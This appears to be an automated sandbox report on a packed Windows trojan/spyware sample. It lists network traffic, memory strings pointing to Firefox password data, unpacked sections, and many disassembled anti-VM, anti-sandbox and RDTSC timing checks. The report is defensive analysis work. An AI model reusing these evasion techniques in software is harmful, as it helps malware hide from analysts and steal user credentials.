              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2106292210.0000000005DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011AFF9C0_3_011AFF9C
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9979121767241379
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2076793763.0000000005AF7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2077250305.0000000005AD8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089937200.0000000005B57000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089730174.0000000005AE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: file.exeVirustotal: Detection: 50%
              Source: file.exeReversingLabs: Detection: 39%
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: file.exeStatic file information: File size 3001344 > 1048576
              Source: file.exeStatic PE information: Raw size of vsrxmbmz is bigger than: 0x100000 < 0x2b1200

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.910000.0.unpack :EW;.rsrc:W;.idata :W;vsrxmbmz:EW;xopfihuh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vsrxmbmz:EW;xopfihuh:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x2e4086 should be: 0x2e79f1
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name: vsrxmbmz
              Source: file.exeStatic PE information: section name: xopfihuh
              Source: file.exeStatic PE information: section name: .taggant
              Source: file.exeStatic PE information: section name: entropy: 7.970180597409933

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF0FA second address: AEF113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jo 00007F79A547B392h 0x0000000d jne 00007F79A547B386h 0x00000013 js 00007F79A547B386h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF113 second address: AEF150 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A4C9A8E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F79A4C9A8EEh 0x00000010 jbe 00007F79A4C9A8ECh 0x00000016 pushad 0x00000017 jo 00007F79A4C9A8E6h 0x0000001d jmp 00007F79A4C9A8EDh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AEF3BD second address: AEF3C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F79A547B386h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2F8A second address: AF2FA3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F79A4C9A8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F79A4C9A8E6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2FA3 second address: AF2FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2FA9 second address: AF2FD4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F79A4C9A8F5h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F79A4C9A8ECh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF2FD4 second address: AF3003 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F79A547B39Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F79A547B386h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF30AB second address: AF30C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF30C0 second address: AF30F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F79A547B399h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF30F2 second address: AF3127 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007F79A4C9A8F5h 0x00000011 jno 00007F79A4C9A8ECh 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF31CE second address: AF31D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3293 second address: AF3299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3299 second address: AF32A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF32A5 second address: AF32F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F79A4C9A8F6h 0x0000000c pop esi 0x0000000d popad 0x0000000e nop 0x0000000f mov esi, ecx 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+122D1F94h], esi 0x00000019 call 00007F79A4C9A8E9h 0x0000001e pushad 0x0000001f je 00007F79A4C9A8E8h 0x00000025 push edi 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F79A4C9A8F4h 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF32F7 second address: AF3329 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F79A547B386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F79A547B392h 0x00000015 popad 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d jne 00007F79A547B388h 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF3329 second address: AF33DC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F79A4C9A8ECh 0x00000008 jnl 00007F79A4C9A8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jmp 00007F79A4C9A8F3h 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push esi 0x0000001c jmp 00007F79A4C9A8F3h 0x00000021 pop esi 0x00000022 pop eax 0x00000023 mov esi, dword ptr [ebp+122D1F89h] 0x00000029 push 00000003h 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D1F9Fh], ecx 0x00000033 push 00000003h 0x00000035 push 97C2BAF1h 0x0000003a pushad 0x0000003b push eax 0x0000003c jno 00007F79A4C9A8E6h 0x00000042 pop eax 0x00000043 jno 00007F79A4C9A8F5h 0x00000049 popad 0x0000004a xor dword ptr [esp], 57C2BAF1h 0x00000051 mov edx, ecx 0x00000053 lea ebx, dword ptr [ebp+12457E90h] 0x00000059 push 00000000h 0x0000005b push edx 0x0000005c call 00007F79A4C9A8E8h 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], edx 0x00000066 add dword ptr [esp+04h], 00000017h 0x0000006e inc edx 0x0000006f push edx 0x00000070 ret 0x00000071 pop edx 0x00000072 ret 0x00000073 mov dword ptr [ebp+122D1CB8h], edi 0x00000079 xchg eax, ebx 0x0000007a jc 00007F79A4C9A8EEh 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF343B second address: AF346D instructions: 0x00000000 rdtsc 0x00000002 je 00007F79A547B386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov si, 0915h 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D1E4Ah], ecx 0x00000017 or esi, dword ptr [ebp+122D2B15h] 0x0000001d push 121A4BDEh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jbe 00007F79A547B386h 0x0000002b jl 00007F79A547B386h 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF346D second address: AF34C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 121A4B5Eh 0x00000010 mov dword ptr [ebp+122D1FCBh], esi 0x00000016 sbb cx, 588Ah 0x0000001b push 00000003h 0x0000001d mov dword ptr [ebp+122D1C9Dh], ebx 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D38CBh], edx 0x0000002b or edx, 6EE59E96h 0x00000031 push 00000003h 0x00000033 jmp 00007F79A4C9A8EEh 0x00000038 push 8BC26EE0h 0x0000003d push eax 0x0000003e push edx 0x0000003f jc 00007F79A4C9A8E8h 0x00000045 push edx 0x00000046 pop edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF34C2 second address: AF350C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 4BC26EE0h 0x00000010 mov ecx, dword ptr [ebp+122D2D7Dh] 0x00000016 lea ebx, dword ptr [ebp+12457E9Bh] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F79A547B388h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000018h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b pop eax 0x0000003c push esi 0x0000003d pop esi 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE735B second address: AE7378 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F79A4C9A8F3h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7378 second address: AE73A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F79A547B386h 0x00000015 jmp 00007F79A547B391h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12F6F second address: B12F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B12F75 second address: B12F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F79A547B38Eh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13132 second address: B13148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F79A4C9A8EFh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13148 second address: B1314D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13A01 second address: B13A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F79A4C9A8E6h 0x0000000a pop edi 0x0000000b jnc 00007F79A4C9A8FAh 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F79A4C9A8F2h 0x00000018 pop ebx 0x00000019 pushad 0x0000001a jmp 00007F79A4C9A8F5h 0x0000001f pushad 0x00000020 jl 00007F79A4C9A8E6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13A46 second address: B13A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13E56 second address: B13E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F79A4C9A8F4h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13E71 second address: B13E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B394h 0x00000009 jmp 00007F79A547B393h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B13FFD second address: B1402A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007F79A4C9A900h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08BBA second address: B08BFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F79A547B38Bh 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F79A547B397h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08BFB second address: B08C0A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F79A4C9A8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B146F1 second address: B146F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B146F6 second address: B146FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B17D57 second address: B17D6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F79A547B38Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18E57 second address: B18E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18E5B second address: B18E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F79A547B392h 0x00000010 pushad 0x00000011 jmp 00007F79A547B399h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18E93 second address: B18E98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B18E98 second address: B18EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A547B38Dh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EB53 second address: B1EB5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jng 00007F79A4C9A8E6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EB5F second address: B1EB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EB63 second address: B1EB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EDE7 second address: B1EDF3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jc 00007F79A547B386h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1EDF3 second address: B1EE1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F79A4C9A8F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F79A4C9A8E8h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1F225 second address: B1F234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F79A547B38Bh 0x00000009 rdtsc
